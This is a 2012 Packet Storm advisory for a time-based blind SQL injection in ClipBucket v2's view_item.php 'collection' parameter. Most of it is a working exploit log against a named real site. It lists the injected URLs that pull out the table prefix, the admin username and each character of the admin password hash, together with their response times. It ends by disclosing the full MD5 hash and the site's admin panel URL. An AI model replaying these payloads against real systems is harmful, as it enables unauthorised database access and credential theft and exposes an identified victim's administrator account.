ClipBucket 2 Blind SQL Injection

2012-07-18T00:00:00
ID PACKETSTORM:114844
Type packetstorm
Reporter Akastep
Modified 2012-07-18T00:00:00

Description

                                        
                                            `===============================================================================  
Vulnerable Software: ClipBucket v2  
Official Site: http://clip-bucket.com/  
  
================================================================================  
Exploited: In Wild.   
================================================================================  
  
Vuln Desc:  
ClipBucket v2 is prone to Blind Sql injection vuln.  
  
It seems it is pretty oldish version and i'm a bit lazy to "fingerprint" which build is vulnerable.  
  
Anyways, at least from source code of page it will "say" : <!-- ClipBucket v2 -->  
  
If you want to fingerprint is target site vulnerable:Use simply this way: (If you got "delay" this means it is vulnerable version)  
  
site.tld/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(1=1,sleep(50),0))--  
  
  
Theris also another way to fingerprint it:  
On vulnerable versions you will find such menu's: (Especially Help Menu section on index page)  
  
  
© ClipBucket v2 2012  
Home Contact Us About us Privacy Policy Terms of Serivce Help  
  
  
Real exploitation example:  
  
  
radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(length(table_name)=char(0x31),sleep(50),0) from information_schema.tables where TABLE_schema !=0x696E666F726D6174696F6E5F736368656D61 limit 1)--  
  
  
  
  
  
table name 13 simvoldur burda  
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(length(table_name)=char(0x3133),sleep(50),0) from information_schema.tables where TABLE_schema !=0x696E666F726D6174696F6E5F736368656D61 limit 1)--  
  
  
  
  
table prefixi oyrenmek lazimdir:  
  
  
  
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(table_name1,1)=char(0x30),sleep(50),0) from information_schema.tables where TABLE_schema !=0x696E666F726D6174696F6E5F736368656D61 limit 1)--  
  
  
  
  
  
  
BU DUZ VERIR.  
//TRUE  
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(0x616263,1,1)=char(0x61),sleep(54),0))--  
  
  
//TRUE tablin 1ci simvolu:  
c  
=========================  
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(table_name,1,1)=char(99),sleep(54),0) from information_schema.tables where TABLE_schema !=0x696E666F726D6174696F6E5F736368656D61 limit 1)--  
  
  
2-ci simvolu: b  
  
  
3-cu simvolu: _  
  
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(table_name,3,1)=char(95),sleep(54),0) from information_schema.tables where TABLE_schema !=0x696E666F726D6174696F6E5F736368656D61 limit 1)--  
  
  
  
table prefix: cb_  
  
  
  
  
User id ni yoxluyuruq:  
  
//TRUE  
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(userid=char(49),sleep(54),0) from cb_users limit 1)--  
  
  
ID=1  
  
UNAME: admin  
  
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(username=char(97,100,109,105,110),sleep(54),0) from cb_users limit 1)--  
  
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(username=char(97,100,109,105,110),sleep(54),0) from cb_users where userid=1)--  
  
  
  
Passi cekmek yolu:  
  
  
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,1,1)=char(97),sleep(54),0) from cb_users where userid=1)--  
  
  
  
PASS:  
=======================================================  
1-ci simvol: 3  
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,1,1)=char(51),sleep(54),0) from cb_users where userid=1)--  
  
YAXUD:  
  
  
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,1,1)=0x33,sleep(54),0) from cb_users where userid=1)--  
  
  
RTIME: 56250 ms  
  
=======================================================  
2-ci simvol: 5  
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,2,1)=0x34,sleep(54),0) from cb_users where userid=1)--  
RTIME: 55578 ms  
=======================================================  
3-cu simvol: c  
  
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,3,1)=0x43,sleep(54),0) from cb_users where userid=1)--  
  
RTIME: 55579 ms  
  
=======================================================  
4-cu simvol: 3  
  
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,4,1)=0x33,sleep(54),0) from cb_users where userid=1)--  
  
RTIME 55656  
=======================================================  
5-ci simvol: a  
  
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,5,1)=0x41,sleep(54),0) from cb_users where userid=1)--  
  
RTIME: 56234  
  
=======================================================  
6-ci simvol: 6  
  
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,6,1)=0x36,sleep(54),0) from cb_users where userid=1)--  
  
RTIME: 69672 ms  
=======================================================  
7-ci simvol: a (yoxla sonra)  
  
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,7,1)=0x41,sleep(54),0) from cb_users where userid=1)--  
  
RTIME : 17266 ms  
=======================================================  
8-ci simvol: 6  
  
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,8,1)=0x36,sleep(54),0) from cb_users where userid=1)--  
  
RTIME: 56141 ms  
  
=======================================================  
9-cu simvol: 6  
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,9,1)=0x36,sleep(54),0) from cb_users where userid=1)--  
  
RTIME: 56125 ms  
=======================================================  
10-cu simvol: 2  
  
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,10,1)=0x32,sleep(54),0) from cb_users where userid=1)--  
  
RTIME: 56157 ms  
=======================================================  
11-ci simvol: 3  
  
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,11,1)=0x33,sleep(54),0) from cb_users where userid=1)--  
  
  
RTIME: 55937 ms  
  
=======================================================  
12-ci simvol: b  
  
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,12,1)=0x42,sleep(54),0) from cb_users where userid=1)--  
  
RTIME: 56234  
=======================================================  
13-cu simvol: 6  
  
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,13,1)=0x36,sleep(54),0) from cb_users where userid=1)--  
  
RTIME: 56219 ms  
  
========================================================  
14-cu simvol: 9  
  
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,14,1)=0x39,sleep(54),0) from cb_users where userid=1)--  
  
RTIME: 56297 ms  
  
========================================================  
  
15-ci simvol: 5   
  
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,15,1)=0x35,sleep(54),0) from cb_users where userid=1)--  
  
RTIME: 55641 ms  
  
=========================================================  
16- ci simvol: f  
  
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,16,1)=0x46,sleep(54),0) from cb_users where userid=1)--  
  
RTIME: 56828 ms  
=========================================================  
  
17-ci simvol: 7  
  
  
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,17,1)=0x37,sleep(54),0) from cb_users where userid=1)--  
  
  
RTIME: 56296 ms  
  
=========================================================  
  
18-ci simvol: 5 (yoxla sonra)  
  
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,18,1)=0x35,sleep(54),0) from cb_users where userid=1)--  
  
  
RTIME: 55469 ms  
  
==========================================================  
  
19-cu simvol: 6  
  
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,19,1)=0x36,sleep(54),0) from cb_users where userid=1)--  
  
RTIME: 56390 ms  
=========================================================  
20-ci simvol: b  
  
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,20,1)=0x42,sleep(54),0) from cb_users where userid=1)--  
  
  
RTIME: 56375  
  
========================================================  
  
21-ci simvol: d (yoxla sonra)  
  
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,21,1)=0x44,sleep(54),0) from cb_users where userid=1)--  
  
RTIME 55796 ms  
  
  
=======================================================  
  
22-ci simvol: d (yoxla sonra)  
  
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,22,1)=0x44,sleep(54),0) from cb_users where userid=1)--  
  
RTIME 56406  
  
  
  
=======================================================  
23-cu simvol: f  
  
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,23,1)=0x46,sleep(54),0) from cb_users where userid=1)--  
  
RTIME: 55563 ms  
  
  
========================================================  
24-cu simvol: 0 (yoxla sonra)  
  
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,24,1)=0x30,sleep(54),0) from cb_users where userid=1)--  
  
RTIME: 56172 ms  
  
========================================================  
25-ci simvol: 4   
  
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,25,1)=0x34,sleep(54),0) from cb_users where userid=1)--  
  
RTIME: 56078 ms  
  
========================================================  
26-ci simvol: 9  
  
  
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,26,1)=0x39,sleep(54),0) from cb_users where userid=1)--  
  
  
RTIME: 55594 ms  
  
========================================================  
27-ci simvol: 6  
  
  
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,27,1)=0x36,sleep(54),0) from cb_users where userid=1)--  
  
  
RTIME: 56094 ms  
  
  
========================================================  
28-ci simvol: 7  
  
  
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,28,1)=0x37,sleep(54),0) from cb_users where userid=1)--  
  
  
RTIME: 56109 ms  
  
========================================================  
29-cu simvol: c  
  
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,29,1)=0x43,sleep(54),0) from cb_users where userid=1)--  
  
  
RTIME: 55563 ms  
  
  
========================================================  
30-cu simvol: d  
  
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,30,1)=0x44,sleep(54),0) from cb_users where userid=1)--  
  
RTIME: 55625 ms  
  
========================================================  
  
31-ci simvol: 5  
  
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,31,1)=0x35,sleep(54),0) from cb_users where userid=1)--  
  
RTIME: 56188 ms  
  
  
=========================================================  
  
32-ci simvol: 7  
  
  
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,32,1)=0x37,sleep(54),0) from cb_users where userid=1)--  
  
  
RTIME: 55625 ms  
  
  
  
=========================================================  
So we got:   
  
uname: admin  
MD5 HASH: 35c3a6a6623b695f756bddf04967cd57  
Admin Panel: http://radio5.5.am/admin_area/  
  
  
//TRUE  
  
Verifying is obtainted hash valid?  
In this case it gives again "delay" which is hint for us: Obtained hash is valid.  
  
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,1,33)=0x3335633361366136363233623639356637353662646466303439363763643537,sleep(54),0) from cb_users where userid=1)--  
  
  
[ ]Done[ ]  
  
  
  
  
  
+++++++++My Special thanks to:+++++++++++++++++++++  
packetstormsecurity.org  
packetstormsecurity.com  
packetstormsecurity.net  
securityfocus.com  
cxsecurity.com  
security.nnov.ru  
securtiyvulns.com  
securitylab.ru  
1337day.com  
secunia.com  
securityhome.eu  
exploitsdownload.com  
exploit-db.com  
to all AA Team + to all Azerbaijan Black HatZ +   
*Especially to my bro CAMOUFL4G3.*  
++++++++++++++++++++++++++++++++++++++++++++++++  
  
Respect && Thank you.  
  
/AkaStep ^_^  
  
  
  
`